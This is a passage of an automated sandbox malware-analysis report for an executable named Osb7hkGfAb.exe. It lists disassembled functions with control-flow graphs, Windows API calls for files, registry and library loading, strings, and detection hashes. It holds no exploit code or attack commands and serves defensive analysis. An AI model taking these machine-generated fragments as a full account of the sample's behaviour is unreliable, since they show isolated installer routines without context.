                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Calibri
                                                                          • API String ID: 3808545654-1409258342
                                                                          • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                          • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                          • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                          • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                                          Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 549 4056e4-40572f CreateDirectoryA 550 405731-405733 549->550 551 405735-405742 GetLastError 549->551 552 40575c-40575e 550->552 551->552 553 405744-405758 SetFileSecurityA 551->553 553->550 554 40575a GetLastError 553->554 554->552
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                          • API String ID: 3449924974-3530169944
                                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                                          Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 555 406492-4064b2 GetSystemDirectoryA 556 4064b4 555->556 557 4064b6-4064b8 555->557 556->557 558 4064c8-4064ca 557->558 559 4064ba-4064c2 557->559 561 4064cb-4064fd wsprintfA LoadLibraryExA 558->561 559->558 560 4064c4-4064c6 559->560 560->561
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                          • wsprintfA.USER32 ref: 004064E2
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                          • API String ID: 2200240437-4240819195
                                                                          • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                          • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                          • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                          • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                                          Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 562 405cbf-405cc9 563 405cca-405cf5 GetTickCount GetTempFileNameA 562->563 564 405d04-405d06 563->564 565 405cf7-405cf9 563->565 567 405cfe-405d01 564->567 565->563 566 405cfb 565->566 566->567
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                          • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 00405CBF
                                                                          • nsa, xrefs: 00405CCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                          • API String ID: 1716503409-2550592448
                                                                          • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                          • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                          • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                          • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                                          Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 568 402cd0-402cf9 call 405f7d 570 402cfe-402d02 568->570 571 402db3-402db7 570->571 572 402d08-402d0c 570->572 573 402d31-402d44 572->573 574 402d0e-402d2f RegEnumValueA 572->574 576 402d6d-402d74 RegEnumKeyA 573->576 574->573 575 402d98-402da6 RegCloseKey 574->575 575->571 577 402d46-402d48 576->577 578 402d76-402d88 RegCloseKey call 406500 576->578 577->575 580 402d4a-402d5e call 402cd0 577->580 583 402da8-402dae 578->583 584 402d8a-402d96 RegDeleteKeyA 578->584 580->578 586 402d60-402d6c 580->586 583->571 584->571 586->576
                                                                          APIs
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnum$DeleteValue
                                                                          • String ID:
                                                                          • API String ID: 1354259210-0
                                                                          • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                          • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                          • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                          • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                          Function 700E16DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 587 700e16db-700e1717 call 700e1a98 591 700e171d-700e1721 587->591 592 700e1834-700e1836 587->592 593 700e172a-700e1737 call 700e22f1 591->593 594 700e1723-700e1729 call 700e22af 591->594 599 700e1739-700e173e 593->599 600 700e1767-700e176e 593->600 594->593 601 700e1759-700e175c 599->601 602 700e1740-700e1741 599->602 603 700e178e-700e1792 600->603 604 700e1770-700e178c call 700e24d8 call 700e1559 call 700e1266 GlobalFree 600->604 601->600 610 700e175e-700e175f call 700e2cc3 601->610 606 700e1749-700e174a call 700e2a38 602->606 607 700e1743-700e1744 602->607 608 700e17dc-700e17e2 call 700e24d8 603->608 609 700e1794-700e17da call 700e156b call 700e24d8 603->609 628 700e17e3-700e17e7 604->628 619 700e174f 606->619 612 700e1746-700e1747 607->612 613 700e1751-700e1757 call 700e26b2 607->613 608->628 609->628 622 700e1764 610->622 612->600 612->606 627 700e1766 613->627 619->622 622->627 627->600 629 700e17e9-700e17f7 call 700e249e 628->629 630 700e1824-700e182b 628->630 637 700e180f-700e1816 629->637 638 700e17f9-700e17fc 629->638 630->592 635 700e182d-700e182e GlobalFree 630->635 635->592 637->630 640 700e1818-700e1823 call 700e14e2 637->640 638->637 639 700e17fe-700e1806 638->639 639->637 641 700e1808-700e1809 FreeLibrary 639->641 640->630 641->637
                                                                          APIs
                                                                            • Part of subcall function 700E1A98: GlobalFree.KERNEL32(?), ref: 700E1D09
                                                                            • Part of subcall function 700E1A98: GlobalFree.KERNEL32(?), ref: 700E1D0E
                                                                            • Part of subcall function 700E1A98: GlobalFree.KERNEL32(?), ref: 700E1D13
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E1786
                                                                          • FreeLibrary.KERNEL32(?), ref: 700E1809
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E182E
                                                                            • Part of subcall function 700E22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 700E22E0
                                                                            • Part of subcall function 700E26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700E1757,00000000), ref: 700E2782
                                                                            • Part of subcall function 700E156B: wsprintfA.USER32 ref: 700E1599
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                          • String ID:
                                                                          • API String ID: 3962662361-3916222277
                                                                          • Opcode ID: 89c6fd6a89110026cd407e11c9f5d14ac50fa8d4c3a06c1d75c630fdf6235f4c
                                                                          • Instruction ID: d67d54434169c7306daad1e1ea8512a736b0d0e34ecfbf701773ce831b5f9764
                                                                          • Opcode Fuzzy Hash: 89c6fd6a89110026cd407e11c9f5d14ac50fa8d4c3a06c1d75c630fdf6235f4c
                                                                          • Instruction Fuzzy Hash: DF4180B21042049EDB01BB76DDC5BDE37FDBB04E30F1484A9E947BA296DB749845CBA0
                                                                          Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 644 401c2e-401c4e call 402bac * 2 649 401c50-401c57 call 402bce 644->649 650 401c5a-401c5e 644->650 649->650 652 401c60-401c67 call 402bce 650->652 653 401c6a-401c70 650->653 652->653 654 401c72-401c8e call 402bac * 2 653->654 655 401cbe-401ce4 call 402bce * 2 FindWindowExA 653->655 667 401c90-401cac SendMessageTimeoutA 654->667 668 401cae-401cbc SendMessageA 654->668 669 401cea 655->669 670 401ced-401cf0 667->670 668->669 669->670 671 401cf6 670->671 672 402a5a-402a69 670->672 671->672
                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                          • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                          • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                          • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                          Function 00402476 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 675 402476-4024a7 call 402bce * 2 call 402c5e 682 402a5a-402a69 675->682 683 4024ad-4024b7 675->683 685 4024c7-4024ca 683->685 686 4024b9-4024c6 call 402bce lstrlenA 683->686 687 4024e1-4024e4 685->687 688 4024cc-4024e0 call 402bac 685->688 686->685 692 4024f5-402509 RegSetValueExA 687->692 693 4024e6-4024f0 call 4030d8 687->693 688->687 697 40250b 692->697 698 40250e-4025eb RegCloseKey 692->698 693->692 697->698 698->682
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000023,00000011,00000002), ref: 004024C1
                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 00402501
                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp
                                                                          • API String ID: 2655323295-1466346684
                                                                          • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                          • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                                          • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                          • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                                          Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
                                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2987980305-0
                                                                          • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                          • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                          • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                          • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                          Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                                          Strings
                                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                          • API String ID: 1892508949-448873956
                                                                          • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                          • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                          • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                          • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                          Function 00405FDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                                          • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID: Call
                                                                          • API String ID: 3356406503-1824292864
                                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
